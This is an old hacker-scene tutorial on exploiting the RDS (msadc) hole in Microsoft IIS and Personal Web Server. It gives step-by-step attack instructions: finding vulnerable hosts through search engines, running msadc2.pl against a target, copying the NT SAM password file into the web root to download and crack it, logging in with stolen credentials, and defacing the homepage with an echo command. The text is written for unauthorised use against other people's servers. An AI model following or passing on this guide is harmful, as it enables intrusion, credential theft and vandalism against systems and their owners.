Hacking IIS/PWS - the RDS Exploit by r00tsec of Security Espionage Community Modified July, IS oo For Windoze9x/2k/nt users. Note: This paper is based on the discoveries by RFP! FIND A SERVER RUNNING IIS OR PWS: To do that do one of the following things: a) Go to www.netcraft.com b) Search for common IIS files via www.altavista.com eg: link:/showcode.asp or url:/msadc/ or url:/iishelp When you have found a server type the following in your browser: www.server.com/index.ida or www.server.com/.idq and the server will more than gladly tell (about 70% of the time) the default physical publication dir of the web service. c:\inetpub\wwwroot\ <- default dir Now download msadc2.pl or msadc.pl from http://sec.subnet.dk in the Programs Section. Also download ActivePerl Interpreter for Windows NT or 9x from www.activestate.com and install it. Now from command.com or cmd.exe run: perl -x c:\msadc2.pl -h www.server.com It'll probably spit something like this out (if you are lucky): cmd /c  then type the command you wish, exempli gratia.: copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\temp.fil In your browser type: www.server.com/temp.fil Tada, you have now got your fingers on the NT Hashed Password file. to extract that file, type (at cmd/command): extract temp.fil whatever.fileNow run L0phtcrack from www.l0pht.com/l0phtcrack or similar to crack whatever.file. When you've cracked whatever.file edit lmhosts.sam (your own) with the following: www.server.com Note: lmhosts.sam is located in \winnt\system32\drivers\etc on Windows NT and in \windows\config\ (if I recall?) on Windows 9x Now go to Start|Find|Computer and type: www.server.com Click the icon and type in user name and password you have gotten from your crack session with l0phtCrack....then Access probably granted.TO HACK THA HOMEPAGE: On www.server.com find the default homepage by typing www.server.com (in your browser) and one of following: index.htm, index.html, index.asp, default.htm, default.html or default.asp and so on. Then run (from console) perl -x c:\msadc2.pl -h www.server.com cmd/c: echo This site has been defaced by m3 4nd 1'm 2 c00l..bl4..bl4... > c:\inetpub\wwwroot\default.htm (assuming default.htm is the main page for www.server.com) In you browser it will look like: This site has been defaced by m3 4nd 1'm 2 c00l..bl4..bl4... There are many other ways to hack www.server.com via the RDS exploit, but I'll leave those for you imagination.  - If you wan't to add something to this paper or know some kung fu style techniques using RDS exploit, let me know -> r00tsec@hushmail.com or submit them in the Contact section at http://sec.subnet.dk Call that a good day and stay put for more stunning papers! Let me know if it worked for you, or if you have any suggestions to other RDS script kiddie methods or the paper just sucks!